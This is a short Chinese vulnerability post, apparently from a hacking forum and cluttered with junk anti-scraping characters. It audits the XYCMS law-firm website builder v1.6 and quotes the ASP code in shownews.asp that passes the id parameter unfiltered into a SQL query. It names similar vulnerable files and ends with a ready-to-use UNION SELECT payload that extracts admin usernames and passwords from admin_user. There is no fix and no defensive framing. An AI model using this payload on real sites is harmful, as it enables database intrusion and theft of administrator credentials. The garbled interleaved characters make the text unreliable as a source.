+ n1 L w7 l% h* c! s% [4 P$ P淫荡分割线 " S M- C' d3 E" ~9 L5 E--------------------------------------------------------% `+ b V( K2 R. m- k8 s3 e' Z
3 j7 @4 p; T7 d b审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测), G2 {3 r7 ~& `; D7 S+ ~- ]& K
源码地址:http://down.chinaz.com/soft/29233.htm 2 F2 e4 e6 ?) B& x7 W 0 Q) W3 n2 j% v* M. X漏洞文件:shownews.asp ( E$ W7 d" ~& M4 w1 c, B漏洞代码:7-13行 " r. W+ W" |: A, O) V: { . k6 X$ a1 V1 N, E$ _9 [+ J
- V. h) X7 t7 i% A: ]<% * a- u: Y" K9 U$ i' Y
id=request.QueryString("id")6 Z! G$ D' G4 b$ f% m
. A3 H% Z, u+ P
set snews=server.createobject("adodb.recordset") 5 r. d; m/ b% |! b
exec="select * from [news] where id="&id4 a, y y4 q9 k$ |+ `( s1 f
snews.open exec,conn,1,1 ! H Y9 p" H3 R B; `) o* J%>7 N) I2 \8 p0 T, d% L2 Q2 q
3 `# D& e6 d( s# v. _ 8 J, o$ q8 g8 M
什么过滤都没有 直造成注入5 a; q3 V5 d. a& E+ k. Z" y* J
" F( f P0 N" s/ S5 E. ^4 A注入点:http://127.0.0.1:99/shownews.asp?id=xx . A! m9 E6 k. C. l" C $ K$ ?" }* I R+ m' Z/ Q7 ^其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找 ( a, b9 H- S4 \9 k2 ^" A9 ^% [ . a$ M- a3 e+ `% I4 s+ j) V
; L: ]5 X( e) X, \" o% U' S2 i2 }1 aexp: union select 1,admin,password,4,5,7 from admin_user; l! B6 q+ @6 v# \) W" B
`! w+ M* d4 S# p- y5 U